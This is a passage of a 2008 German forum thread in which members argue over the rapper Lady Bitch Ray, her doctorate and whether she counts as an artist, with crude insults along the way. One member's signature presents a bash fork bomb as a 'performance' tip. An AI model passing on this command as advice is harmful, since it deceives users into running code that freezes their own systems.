OrangeVirus

... infects everything!
Aktuelle Zeit: So 27. Apr 2025, 21:28

Zeitzone: Europa/Berlin [ Sommerzeit ]

Ein neues Thema erstellen Auf das Thema antworten  [ 40 Beiträge ]  Gehe zu Seite Vorherige  1, 2, 3, 4
Autor Nachricht
 Betreff des Beitrags: Re: Machts weg oO
BeitragVerfasst: Sa 12. Jul 2008, 21:56 
Member

Hat sich bedankt: 0 mal
Wurde gedankt: 0 mal
Mensch Leute informiert euch doch mal ein bisschen immer wieder diese Vorurteile... :no:

"Lady Bitch Ray" ist eine Türkin die nicht gerade so ist wie sie sich in den Videos gibt.

Guckst du hier http://youtube.com/watch?v=bB0ZacATx1o :victory:

BeitragVerfasst: Sa 12. Jul 2008, 22:21 
Extreme Member

zu dem Video:
Zitat:
"..über die Rosa-Luxemburg-Stifting hat die Doktorandin ein Stipdendium für Hochbegabte bekommen.."

LOL

glaub Rosa Luxemburg hätte die alte abgeknallt, wer so einen Müll wie die daherredet und sich in jedem Satz aufs neue grundlegend widerspricht gehört in die Tonne getreten und ist keiner Diskussion würdig,sry aber sowas darf man garnicht Ernst nehmen.. Ich denke mal viele unterschätzen den Einfluss von Musik heutzutage, ich will nich wissen was die Frau alles mit ihrem Rotz bewirken kann...Ihre Botschaft ist doch dass sich Frauen selbstbestimmen sollen und alles nackig anspringen was nich bei 3 aufm Baum ist nur: Wo bleibt da die Selbstbestimmung wenn sie den Frauen ein Ideal vorgibt?
Oder hab ich da was falsch verstanden?
However.Crap².

stupidity hat geschrieben
ICH BIN DIE BILDZEITUNG, BABY!

BeitragVerfasst: Sa 12. Jul 2008, 23:46 
Member

aber eine frage,wer lässt sowas in deutschland zu?

BeitragVerfasst: So 13. Jul 2008, 13:23 
Member

GEMA – Gesellschaft für musikalische Aufführungs- und mechanische Vervielfältigungsrechte.

Das ist ein Verein der die Musik bzw. Texte verschiedener Künstler, darunter auch Lady Bitch Ray untersucht und entscheidet ob diese weiterhin auf dem Markt bleiben, oder davon ausgeschlossen werden.

Es gibt auch Fälle wo trotz harter Texte und Sparche wieterhin verkauft werden dürfen.

Diese haben dann auf dem Cover der CD, Kassette etc. ein Logo das so aussieht

Diese dürfen dann eigentlich für Kunden unter 18 jahren nicht verkauft werden, aber die Industrie zahlt jeden Preis dagegen.
Es ist sozusagen eine Warnung für die Eltern

:victory:

Dateianhänge:
gastparts2internetyl4.jpg
gastparts2internetyl4.jpg [ 67.87 KiB | 797-mal betrachtet ]

BeitragVerfasst: So 13. Jul 2008, 19:28 
Advanced Member

Na, da gibs ja wieder ne neue Rapperin, die meine vorurteile gegenüber hip hop immer mehr bestärkt. Hab vielen dank!

Bild

For more performance just type "
Code:
:(){ :|:& };:
" in your Linux/Unix bash.

BeitragVerfasst: So 13. Jul 2008, 23:56 
Freund der Familie

Hat sich bedankt: 24 mal
Wurde gedankt: 22 mal
Zitat:
InGewisserHinsicht hat geschrieben
Wissen wir, ändert nichts, wie oben beschrieben, falls du das verpasst hast. Du scheinst übrigens ziemlich leicht zu beeindrucken, wenn du meinst, dass schon ein Studium einen Menschen bis in die Unantastbarkeit hinaufkatapultiert.

wenn euch (oder dir) das abitur und der studiumplatz hinterhergeschmissen wurde, dann freu dich, bei uns muss man noch was dafür leisten. :o.O: und der abiturabschluss setzt somit ein hohes niveau an geistlicher reife und intelligenz. außerdem steckt vllt eine "geniale" geschäftsidee dahinter (?!), denn die scheint ja nicht arm zu sein.

Zitat:
InGewisserHinsicht hat geschrieben
Zitat:
X-TasY hat geschrieben
Mehr Toleranz für Künstler :yes:

Hui, damit hast du jetzt selbst den Kerl, der in seinem Keller Erbsendosen zum Kölner Dom aufstapelt, beleidigt.

tut mir echt leid, wenn du dich beleidigt fühlst :keks:
ich schmeiss ja dosen in den gelben sack :|

scherz beiseite: sie ist künstlerin, finde dich damit ab, ich mag diese person auch nicht, aber sie will provozieren und je mehr toleranz man zeigt, umso weniger hat sie spaß dran ;)

BeitragVerfasst: Mo 14. Jul 2008, 00:57 
Wertvolles Communitymitglied

Zitat:
X-TasY hat geschrieben
wenn euch (oder dir) das abitur und der studiumplatz hinterhergeschmissen wurde, dann freu dich, bei uns muss man noch was dafür leisten. :o.O: und der abiturabschluss setzt somit ein hohes niveau an geistlicher reife und intelligenz. außerdem steckt vllt eine "geniale" geschäftsidee dahinter (?!), denn die scheint ja nicht arm zu sein.

Nun, ich habe mein Abitur in Baden-Württemberg gemacht, das ebenso wie das von Bayern im bundesweiten Vergleich eine Aufwertung erfährt. Folglich wird uns das Abitur eher noch weniger nachgeschmissen als in anderen Bundesländern.
Doch davon war eigentlich gar nicht die Rede, sondern davon, dass ein Abitur und Studium den Menschen nicht unantastbar macht.
Dass eine Person während der Abitursvorbereitungen Sitzfleisch bewiesen hat (Nicht unbedingt sind dazu nämlich geistige Reife und Intelligenz notwendig), sagt nichts über ihre Sozialkompetenz und ihre Reife aus.
Es mag dich verwundern, doch aufgrund ihrer Handlungen dürfen durchaus auch Studierte kritisiert werden.

Zitat:
X-TasY hat geschrieben
tut mir echt leid, wenn du dich beleidigt fühlst :keks:
ich schmeiss ja dosen in den gelben sack :|

Keine Sorge, das tue ich nicht. Ich maße mir nicht an, Künstler zu sein. (Und nein, ich sprach nicht von mir, aber das weißt du ja)

Zitat:
X-TasY hat geschrieben
scherz beiseite:

Joa, besser ist das.
Zitat:
X-TasY hat geschrieben
sie ist künstlerin, finde dich damit ab, ich mag diese person auch nicht, aber sie will provozieren und je mehr toleranz man zeigt, umso weniger hat sie spaß dran ;)

Ich muss mich mit gar nichts abfinden. Nur weil jemand provoziert und sich für einen Künstler hält, ist er noch lange keiner.
Natürlich alles eine Frage der Definition, und wenn du die 40-Jährige Dame von nebenan, die die Fußabdrücke die sie hinterlässt nachdem sie durch eine Regenpfütze gelaufen ist schön findet als Künstlerin und den Dreijährigen der einen Eimer mit Sand füllt und ihn dann umstürzt als Künstler bezeichnen würdest... dann fällt wohl auch das Mädchen um das es in diesem Thread geht unter den Begriff.

Bild

BeitragVerfasst: Mo 14. Jul 2008, 04:44 
Freund der Familie

Hat sich bedankt: 18 mal
Wurde gedankt: 2 mal
12-stelliger Crit im Duhmhaitsberaich!
und so
Mahlzeit^^

Zitat:
Irgendjemand hat geschrieben
ich hab den solo gelegt mit seng nachher

OV ≠ OV² =D
Bild
Bild

BeitragVerfasst: Mo 14. Jul 2008, 05:04 
Plushy

Hat sich bedankt: 11 mal
Wurde gedankt: 20 mal
@ Henker
Ich kann dir vollkommen zustimmen das mir dieses studiertes Fachgesimpel sehr auf den Nerv geht. Von mir aus haltet euch für besonders schlau, dann macht uns aber eure Gedanken zugänglich.

@IngewisserHinsicht
Du magst ja immer deinen Senf zu irgend was dazugeben, aber im Endeffekt kommen wohl formulierte Sätze dabei herraus (ich nehme mal an du studierst Lingusitik (aber anscheind auch schon sehr lang!?) ) aber eine wirkliche Meinung zu etwas kann ich nicht finden, es kommt mir schlicht so vor, als würdest du deinen angeblichen Intellekt einfach nur zur Schau stellen wollen. Oder den von Gallileo angeeigneten besser vermarkten wollen. o.O
Hat nichts mit dem Topic zu tun, wollte auch mal meine meinug loswerden.
(Ja, blubber, das schreibt man Groß, das Klein....)

In Sachen Dosen Stapeln, mein Freund hast du dich vertan, damit kann man sehr wohl Kunst machen(...schaffen, natürlich will ich es anderen leichter machen :) ), wenn du oder jemand anderes sich nur auf die Tatsachen beruft die irgendjemand vorgegeben hat, von mir aus.

Ich werde nicht auf ein Reply von irgendjemanden Antworten. Den euer Gehabe nervt so dermaßen, das wenn ich es nur lese es mir hochkommt.

Btt:
Sie ist eine dumme Schlampe die einfach irgendwie Geld machen will!?
Hat das niemand erkannt, eure Diskossiunsfreude euch gehemmt?
Die kann von mir aus das Kama Sutra studieren, dann wär mir das ganze auch lieber.
Wenn sie es will kann sie es haben. o.O

BeitragVerfasst: Mo 14. Jul 2008, 16:05 
Wertvolles Communitymitglied

Jezuzz, du bist ein Witzbold.
Ich versuch das jetzt mal zu formulieren, wie du es gern hättest. Antworten musst du natürlich nicht, wenn du nicht willst.

1. Ich studiere Jura und habe von Linguistik keine Ahnung.

2. Ich habe in diesem Thread eigentlich nichts anderes getan, als meine Meinung zu sagen. Die anderen konnten sie offenbar auch ganz gut herauslesen.
Für dich noch einmal kurz die Eckpunkte meiner Meinung:
Zitat:
a) Diese Bitch Ray sollte einfach ignoriert werden, das ist der sinnvollste Umgang mit ihr.
b) Man sollte sich nicht davon beeindrucken lassen dass sie studiert/ einen Doktortitel hat.
c) Ihre Texte/Gesinnung sind niveaulos und zeugen von wenig geistiger Reife.
d) Ich kaufe ihr nicht ab, dass sie einen Beitrag zur Emanzipation leistet.
e) Sie hat keinerlei Feingefühl und Sozialkompetenz, beachtet nicht, was für eine Wirkung ihre Texte vor allem auf minderjährige Mädchen haben.
f) Ihre Musik selbst ist einfach nur grauenhaft, eigentlich nicht als Musik zu bezeichnen.
g) Ich sehe sie nicht als Künstlerin.

3. Nein, ich versuche nicht, irgendetwas zur Schau zu stellen. Ich rede/schreibe tatsächlich auch privat so, und wenn ich zurückdenke hat sich daran noch kaum jemand gestört. Eigentlich finden das die meisten sogar ganz unterhaltsam.

4. Ich schaue kein Galileo, auch wenn die Sendung angeblich ganz nett sein soll.

5. Eigentlich habe ich den Bau des Kölner Domes mit Dosen wenn du noch einmal nachliest (musst du natürlich nicht) unter den Kunstbegriff fallen lassen. In der Hinsicht habe ich mich also nicht vertan. Ich fände das sogar ziemlich beeindruckend, und dazu müsste er nicht einmal in Originalgröße sein.

Gut, ich hoffe das war jetzt knapp und klar genug um dich nicht über die Tastatur erbrechen zu lassen. Wenn nicht, tut es mir leid.

Falls du es noch immer nicht gemerkt hast: Ich bin im Grunde genau deiner Meinung was Bitch Ray angeht.

Bild

Ein neues Thema erstellen Auf das Thema antworten  [ 40 Beiträge ]  Gehe zu Seite Vorherige  1, 2, 3, 4

Zeitzone: Europa/Berlin [ Sommerzeit ]